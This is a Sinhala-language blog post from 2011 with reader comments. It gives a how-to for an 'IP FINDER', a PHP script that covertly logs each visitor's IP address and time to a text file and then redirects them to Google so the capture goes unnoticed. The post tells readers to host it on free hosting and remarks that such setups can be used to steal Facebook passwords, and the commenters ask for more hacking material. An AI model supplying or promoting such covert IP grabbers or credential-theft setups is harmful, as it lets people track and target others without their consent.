Adlink

Tuesday, May 10, 2011

IP FINDER අපිම හදමු







හෙ හෙ අද කියල දෙන්න යන්නේ IP FINDER එකක් අපිම හදන විදිහ.හරි ලේසි මුලින්ම කියන්න ඕනි මට php බැ මම මේක ගත්තෙ indian blog එකකින් කියලා .:D හරි දැන් අපි වැඩේට බහිමු.බය වෙන්න එපා හරි ලේසි.ආහ් තව දෙයක් කියන්න ඕනි බය වෙන්න දෙයක් නැ මේක ඇතුලෙ hide කරපු code නැ හොදේ. මුලින්ම කරන්න තියෙන්නෙ desktop එකේ right click කරලා new ගිහින් Text Document එකක් හදාගන්න.ඊට් පස්සේ ඒක Rename කරන්න ip.php කියලා.හරි දැන් ඒ ෆයිල් එක open කරලා පහල තියෙන code එක copy කරලා past කරන්න.



<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("ip_log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
header( 'Location: http://www.google.com' ) ;
?>

 දැන් හරි ඊට පස්සෙ තව text file එකක් හදා ගෙන ඒක rename කරන්න ip_log.txt
දැන් වැඩේ හරි.දැන් අපි මේ php code එක run කරන්න. free hosting දෙන සයිට් එකක හොස්ට් එකක් හදා ගන්න ඕනි සයිට් ගොඩක් තිබ්බත් 
http://freezoka.net සයිට් එක ගොඩක් හොදයි.hosting account එකක් හදා ගන්න හැටි මම screen shot ගත්ත ටික මම බ්ලොග් එකට upload කරන්නැ මොකද ඒක මට වගේම dial up connection භාවිතා කරන අයට වෙන කරදරයක් මොකද screen shots වැඩිපුර දාපුවාම page එක load වෙන්න වෙලා යනවා ඒක නිසා මම screen shot ටික වෙනම upload කරන්නම් download කරගන්න. ඒකෙ තියෙනවා ඔක්කොම කරගන්න විදිහ.
මේ free hosting site එකේ user name,pass word කොහෙහරි ලියලා තියාගන්න.මේකෙන් ගොඩක් ජාති කරන්න පුලුවන්.fb pass word උස්සන ඒවා වගේ ඒවා.
ඔයාලට  හිතෙන ඒවා comment එකක් විදිහට දාලා යනව නම් මම කැමති.
එහෙනම් කට්ටියටම ජය වේවා !
අහ් මතක ඇතුව  file එක download කරගන්න.ඔන්න file හදන්න කැමති නැති අයට මම ip.php එකයි ip_log.txt දාලාම දෙන්නම්කො.


free hosting site එකට මෙතනින් යන්නhttp://freezoka.net/
****ෆයිල් එක වැඩිය ලොකු නැ 480kb පොඩි file එකක්
screen shot ටික මෙතනින් ගන්න මම ලින්ක් දෙකක් දාන්නම් කැමති එකකින් download කරගන්න.



Link



3 comments:

  1. Ela machan wade nam hondai... thawa tika hacjking gana dapanko.,.,.

    ReplyDelete
  2. පට්ට ‌෴෴෴෴෴෴෴
    ෆ්බ් එක ගැන පොඩි විස්තරයක් දන්මන්ම් තවත් නියමයි

    ReplyDelete
  3. Fb gana keewe machan mata terun nae

    ReplyDelete

කැමති කෙනෙක් කමෙන්ට් එකක් දාන්න අවුලක් නැ දැම්මත් නැතත් බ්ලොග් එක ලියනවා